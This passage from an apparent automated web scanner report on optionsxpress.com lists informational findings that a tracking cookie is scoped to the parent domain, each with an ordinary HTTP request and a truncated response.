X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AAB5420D4DEFA11E2D23D3B00A9C5FCC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:12 GMT

.PNG
.
...IHDR.......d.....0+j....IDAT....K
.@...wKo..<...*..3....7Yi...........^.'C......Emo...
.6t.=.....h...1y.!..FC.#.>9...*.e.+xTd%.yE...VP.@.bV....s..?|Y..K.U.9..*....IEND.B`.

9.81. http://www.optionsxpress.com/images/welcome/home/log_out.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/welcome/home/log_out.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/log_out.gif HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=B7B8CAE441A79F28A820CD92711B9316; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.82. http://www.optionsxpress.com/images/welcome/home/open_account_4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/welcome/home/open_account_4.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/open_account_4.gif HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 May 2011 15:39:54 GMT
Accept-Ranges: bytes
ETag: "d7ffadd57115cc1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=33DB87124BC0F05E3333A1912CEC33AA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

GIF89a.............!.......,...........D..;

9.83. http://www.optionsxpress.com/inc/css/fonts.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/fonts.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/fonts.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=7C8B1C7F4AFB6F7AAC1E08B8CCC82FA9

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 26 Jan 2011 17:22:07 GMT
Accept-Ranges: bytes
ETag: "ddafed8e7dbdcb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D8D6708B4FD4951D7D49549B550A7D35; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:40 GMT
Vary: Accept-Encoding
Content-Length: 398865

@font-face {
   font-family: 'Avenir';
   src: local('...'), url(data:font/ttf;charset=utf-8;base64,AAEAAAAQAQAABAAARkZUTVrKoYEAAAEMAAAAHEdERUYEHALoAAABKAAAAERPUy8ymFMrRAAAAWwAAABgY21hcJ+9QgQAAAHMAAAB0mN2
...[SNIP]...

9.84. http://www.optionsxpress.com/inc/css/nav.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/nav.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/nav.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=EF6A174C4F8A82EC6AAA8D88589E4FD2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:39 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.85. http://www.optionsxpress.com/inc/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/print.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/print.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 200 OK
Content-Length: 1497
Content-Type: text/css
Last-Modified: Fri, 05 Aug 2011 15:10:14 GMT
Accept-Ranges: bytes
ETag: "4e322dc78153cc1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=FBF0413E4A3D95D87425BCBE085769C7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:43 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* -----------------------------------------------------------------------


Blueprint CSS Framework 1.0
http://blueprintcss.org

* Copyright (c) 2007-Present. See LICENSE for more info.

...[SNIP]...

9.86. http://www.optionsxpress.com/inc/css/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/screen.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/screen.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=7C8B1C7F4AFB6F7AAC1E08B8CCC82FA9

Response

HTTP/1.1 200 OK
Content-Length: 12224
Content-Type: text/css
Last-Modified: Tue, 01 Feb 2011 15:47:27 GMT
Accept-Ranges: bytes
ETag: "a7cef15327c2cb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=DACC901F4112EE44A3EEF6BEA615CEAA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:40 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* -----------------------------------------------------------------------


Blueprint CSS Framework 1.0
http://blueprintcss.org

* Copyright (c) 2007-Present. See LICENSE for more info.
* See
...[SNIP]...

9.87. http://www.optionsxpress.com/inc/css/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/styles.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 82959
Content-Type: text/css
Last-Modified: Thu, 14 Apr 2011 20:28:55 GMT
Accept-Ranges: bytes
ETag: "56454d93e2facb1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=7C8B1C7F4AFB6F7AAC1E08B8CCC82FA9; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:38 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* CSS3 Fonts */
@import "/inc/css/fonts.css";
/* Blueprint CSS Framework */
@import "/inc/css/screen.css";
/* jQuery UI */
@import "/inc/css/ui.css";
/* Navigation Menu */
@import "/inc/css/na
...[SNIP]...

9.88. http://www.optionsxpress.com/inc/css/ui.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/ui.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/ui.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=7C8B1C7F4AFB6F7AAC1E08B8CCC82FA9

Response

HTTP/1.1 200 OK
Content-Length: 28631
Content-Type: text/css
Last-Modified: Tue, 12 Apr 2011 16:23:21 GMT
Accept-Ranges: bytes
ETag: "4985d1f02df9cb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:39 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

.ui-helper-hidden { display: none; }
.ui-helper-hidden-accessible { position: absolute !important; clip: rect(1px 1px 1px 1px); clip: rect(1px,1px,1px,1px); }
.ui-helper-reset { margin: 0; padding: 0;
...[SNIP]...

9.89. http://www.optionsxpress.com/inc/general.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/general.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/general.js HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 353785
Content-Type: application/x-javascript
Last-Modified: Tue, 31 May 2011 14:21:06 GMT
Accept-Ranges: bytes
ETag: "5ccde7fa9d1fcc1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1F7A609F4712C324D98618822A48CA7B; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:38 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// SV 5/16/08 cdn_path is the url of the akamai servers. this checks to see if the cdn_path is defined on the page, and if not assignes it a value of null
try {
   if(cdn_path) {
       // do nothing
   }
...[SNIP]...

9.90. http://www.optionsxpress.com/inc/js/library.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/js/library.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/js/library.js HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 248416
Content-Type: application/x-javascript
Last-Modified: Fri, 13 May 2011 19:11:26 GMT
Accept-Ranges: bytes
ETag: "0c3328ea111cc1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=160C0A0240749D5BBE2BCAB62A01C888; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:38 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.5.2
* http://jquery.com/
*/
(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var
...[SNIP]...

9.91. http://www.optionsxpress.com/inc/js/stats.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/js/stats.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/js/stats.js HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 35213
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 16:30:04 GMT
Accept-Ranges: bytes
ETag: "0ce19b9f7eecb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A8A1FAB14569D172B2EDD88EE7023B03; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:37 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

function omniAccount(){ // determines account numbers in omniture based on firm type
   switch(oxVars.firm) {
       case 'OX':
           oxVars.stat_account = 'oxpressprodus'; // oxpressdev
           break;
       case '
...[SNIP]...

9.92. http://www.optionsxpress.com/inc/js/xpress.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/js/xpress.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/js/xpress.js HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 15383
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 19:05:07 GMT
Accept-Ranges: bytes
ETag: "8033892bfc13cc1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=84BED26B483FAA99856E1BA65F2756BD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:38 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


// *********** Global Variables ***********
var oxVars            = {};
oxVars.cdn            = '';
oxVars.firm            = '';
oxVars.sessionID    = null;
// ********* END Global Variables *********

$(document).ready(o
...[SNIP]...

9.93. http://www.optionsxpress.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /index.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=107E93BD465512E40B5A70B74A34183A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:43 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.94. http://www.optionsxpress.com/our_products/futures.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /our_products/futures.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_products/futures.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17366
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=6440376E42918CD8B2CA6C93434774A7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.95. http://www.optionsxpress.com/our_products/more_choices.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /our_products/more_choices.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_products/more_choices.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15988
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=D25B11E6448CFB6AF7D08BAD666AE1C0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:38 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.96. http://www.optionsxpress.com/our_products/options.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /our_products/options.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_products/options.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16905
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=F0AB4137413D5F1C754265B218B191B8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:37 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.97. http://www.optionsxpress.com/our_products/stocks.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /our_products/stocks.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_products/stocks.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16497
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=61C1D4C340663C2F694DFDB17219CAA8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.98. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /promos/experience_an_options_specialist.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20472
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=DF3642BF4CCA46E3BCB4B2AC904A07B2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:37 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Options tradin
...[SNIP]...

9.99. http://www.optionsxpress.com/promos/none  previous  next

Summary

Severity:   Information
Confidence:   Certain
